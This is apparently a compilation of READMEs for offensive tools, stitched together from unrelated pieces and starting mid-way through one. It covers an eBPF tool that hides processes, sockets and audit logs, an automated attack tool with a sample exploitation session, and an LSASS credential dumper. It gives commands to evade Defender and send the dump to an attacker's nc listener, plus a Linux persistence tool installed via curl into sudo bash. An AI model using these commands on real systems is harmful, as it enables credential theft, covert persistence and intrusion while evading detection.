Like any eBPF program, bpftool uses the bpf() system call, more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed to by the attr argument.
To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed-to address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.
In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.
Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().
Auditd receives its logs from recvfrom(), which stores its messages in a buffer. If the message received was generated by a nysm process through audit_log_end(), the message length in its nlmsghdr header is replaced with 0.
Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record. As getdents64() requires looping through all its files, the eBPF instruction limit is easily reached. Therefore, nysm uses tail calls before reaching it.
Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools, as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the length of all these messages combined.
Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.
These are collected from the connect() and bind() calls.
Even with the best effort, nysm still has some limitations.
Every tool that does not close its file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is run before top, the processes will not show up. But if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.
Kernel logs: in dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop up several times because of the eBPF verifier each time nysm runs.
Many traces written into files are left, as hooking read() and write() would be too heavy (but still possible); for example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.
Hiding ss recvmsg() can be challenging, as a new socket can pop up at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to swap the first one with the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket's information with hardcoded values.
Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided, as it would hide every non-nysm eBPF object.
Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.
CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly select suitable attack techniques for the target systems to be attacked. CATSploit uses system configuration information such as OS, open ports and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack (a professional pentester's skill).
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input: First, it gathers information about the target systems. CATSploit supports nmap and OpenVAS to gather information about target systems, and also supports prior information about the target systems if you have it.
Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, evaluation values of capture (eVc) and detectability (eVd) are calculated for each attack technique, per target computer.
Selection of attack techniques and attack scenario creation: Attack techniques are selected and attack scenarios created according to pre-defined policies. For example, for a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected.
Execution of attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and the Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
Metasploit, Nmap and OpenVAS are assumed to be installed with the Kali distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with the -h option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan the network, plan an attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0 β kali β kali 2022.4 β True β
β h_exbiy6 β 192.168.0.10 β β Linux 3.10 - 4.11 β False β
β h_nhqyfq β 192.168.0.20 β β Microsoft Windows 7 SP1 β False β
ββββββββββββ΄βββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄βββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4 β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β β β β
ββββββββββββββββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip β proto β port β service β product β version β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 21 β ftp β ProFTPD β 1.3.5 β
β 192.168.0.10 β tcp β 22 β ssh β OpenSSH β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp β 80 β http β Apache httpd β 2.4.7 β
β 192.168.0.10 β tcp β 445 β netbios-ssn β Samba smbd β 3.X - 4.X β
β 192.168.0.10 β tcp β 631 β ipp β CUPS β 1.7 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ vuln_name                                                           ┃ cve            ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 0    │ TCP Timestamps Information Disclosure                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 21   │ FTP Unencrypted Cleartext Login                                     │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak MAC Algorithm(s) Supported (SSH)                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Encryption Algorithm(s) Supported (SSH)                        │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Host Key Algorithm(s) (SSH)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Test HTTP dangerous methods                                         │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check    │ CVE-2014-3704  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Sensitive File Disclosure (HTTP)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Unprotected Web App / Device Installers (HTTP)                      │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Cleartext Transmission of Sensitive Information via HTTP            │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.9.0 XSS Vulnerability                                    │ CVE-2012-6708  │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.6.3 XSS Vulnerability                                    │ CVE-2011-4969  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal 7.0 Information Disclosure Vulnerability - Active Check      │ CVE-2011-3730  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-2183  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-6329  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2011-3389  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2015-0204  │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴────────────────┘
[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┡━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd   ┃ steps ┃ first attack step             ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 32.0  │ 1     │ exploit/multi/http/jenkins_s… │
│ 5gnsvh      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ 6nlxyc      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 48.32 │ 2     │ exploit/multi/http/jenkins_s… │
│ 8jos4z      │ 0.0.0.0     │ 192.168.0.10   │ 0.7   │ 72.8  │ 2     │ exploit/multi/http/jenkins_s… │
│ 8kmmts      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 32.0  │ 1     │ exploit/multi/elasticsearch/… │
│ agjmma      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/windows/http/managee… │
│ joglhf      │ 0.0.0.0     │ 192.168.0.10   │ 70.0  │ 60.0  │ 1     │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof      │ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0  │ 1     │ exploit/multi/http/drupal_dr… │
│ xuowzk      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/multi/http/struts_dm… │
│ yttv51      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ znv76x      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘
catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd  ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0 │
└─────────────┴────────────────┴───────┴──────┘
[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step                                  ┃ params                 ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10   │
│   │                                       │ LHOST: 192.168.10.100  │
└───┴───────────────────────────────────────┴────────────────────────┘
catsploit> attack rmgrof
> ~
> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All information and code are provided solely for educational purposes and/or for testing your own systems.
For any inquiries, please contact the following email address:
catsploit@nk.MitsubishiElectric.co.jp
PPLBlade is a Protected Process Dumper tool that supports obfuscating the memory dump and transferring it to remote workstations without dropping it onto the disk.
Key functionalities: dumping protected processes via the Process Explorer driver, XOR-obfuscating the memory dump to bypass Defender's LSASS dump detection, and transferring the dump over the network without writing it to the target's disk.
An overview of the techniques used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
Note that PROCEXP152.sys is listed in the source files for compiling purposes. It does not need to be transferred to the target machine alongside PPLBlade.exe; it's already embedded into PPLBlade.exe. The exploit is just a single executable.
Modes (--mode): dump, decrypt, dothatlsassthing (see the examples below).
Handle modes (--handle): e.g. procexp, which uses the Process Explorer driver to obtain the process handle.
Basic POC that uses PROCEXP152.sys to dump lsass:
PPLBlade.exe --mode dothatlsassthing
(Note that this mode does not XOR the dump file; pass the additional --obfuscate flag to enable the XOR functionality.)
Upload the obfuscated LSASS dump to a remote location:
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
Attacker host:
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
Deobfuscate the memory dump:
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
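Judging by the --obfuscate and --key flags, the obfuscation appears to be a simple repeating-key XOR. Below is a minimal, hypothetical Python sketch of the deobfuscation step (the project's own deobfuscate.py may differ in its details; the default key matches the --key value from the example above):

# xor_deobfuscate.py - hypothetical sketch of a repeating-key XOR deobfuscator
import argparse

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # XOR each byte of the dump with the key, cycling the key as needed
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

parser = argparse.ArgumentParser(description="XOR-deobfuscate a memory dump")
parser.add_argument("--dumpname", required=True, help="obfuscated dump file")
parser.add_argument("--key", default="PPLBlade", help="XOR key used during dumping")
args = parser.parse_args()

with open(args.dumpname, "rb") as f:
    blob = f.read()

with open(args.dumpname + ".dec", "wb") as f:
    f.write(xor_bytes(blob, args.key.encode()))

Because XOR with the same key is its own inverse, the identical routine would serve for both obfuscation and deobfuscation.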
Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.
Clone the Repository:
git clone https://github.com/spyboy-productions/Valid8Proxy.git
Navigate to the Directory:
cd Valid8Proxy
Install Dependencies:
pip install -r requirements.txt
Run the Tool:
python Valid8Proxy.py
Follow the interactive prompts: the tool fetches proxies, validates them, and prints the working ones.
Working proxies are saved to a file so they can be reused later.
If you already have a list of proxies and only want to check them, run:
python Validator.py
Follow the prompts:
Enter the path to the file containing proxies (e.g., proxy_list.txt) and the number of proxies you want to validate. The script then validates that many proxies using multiple threads and prints the valid ones.
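A proxy check of this kind typically boils down to issuing a test request through each candidate and keeping the ones that answer. Here is a minimal sketch of that idea, assuming plain HTTP proxies and using requests with a thread pool (the test URL, worker count, and file name are illustrative assumptions, not taken from the project):

# validator_sketch.py - illustrative multi-threaded proxy check
from concurrent.futures import ThreadPoolExecutor
import requests

TEST_URL = "https://httpbin.org/ip"  # assumption: any stable endpoint works

def is_alive(proxy: str, timeout: float = 5.0) -> bool:
    # Route one request through the proxy; any HTTP success counts as "working"
    cfg = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        return requests.get(TEST_URL, proxies=cfg, timeout=timeout).ok
    except requests.RequestException:
        return False

with open("proxy_list.txt") as f:  # one ip:port per line
    candidates = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=20) as pool:
    for proxy, ok in zip(candidates, pool.map(is_alive, candidates)):
        if ok:
            print(f"[+] Working: {proxy}")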
Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.
D3m0n1z3dShell (Demonized Shell) is an advanced tool for establishing persistence on Linux.
git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh
Download D3m0n1z3dShell with all files:
curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh
Load D3m0n1z3dShell statically (without the static-binaries directory):
sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh
More features will be added in future releases.
If you want to contribute and help improve the tool, please contact me on Twitter: @MatheuzSecurity
We are not responsible for any damage caused by this tool; use it responsibly and for educational purposes only.
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Usage:
Add your proxies to proxies.txt, one per line, in the format 50.168.163.176:80.
How to Use:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
pip3 install -r requirements.txt
python3 PhantomCrawler.py
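The core loop is simple: read the proxy list and replay requests to the target through each proxy, parsing the response with BeautifulSoup. A rough sketch of that idea, assuming the proxies.txt format shown above (the target URL and output format are illustrative assumptions, not the project's own code):

# crawler_sketch.py - illustrative request-through-proxies loop
import requests
from bs4 import BeautifulSoup

TARGET = "https://example.com"  # assumption: the real tool prompts for the URL

with open("proxies.txt") as f:  # one ip:port per line, e.g. 50.168.163.176:80
    proxies = [line.strip() for line in f if line.strip()]

for proxy in proxies:
    cfg = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        resp = requests.get(TARGET, proxies=cfg, timeout=10)
        title = BeautifulSoup(resp.text, "html.parser").title
        print(f"[{proxy}] {resp.status_code} {title.string if title else ''}")
    except requests.RequestException as exc:
        print(f"[{proxy}] failed: {exc}")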
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.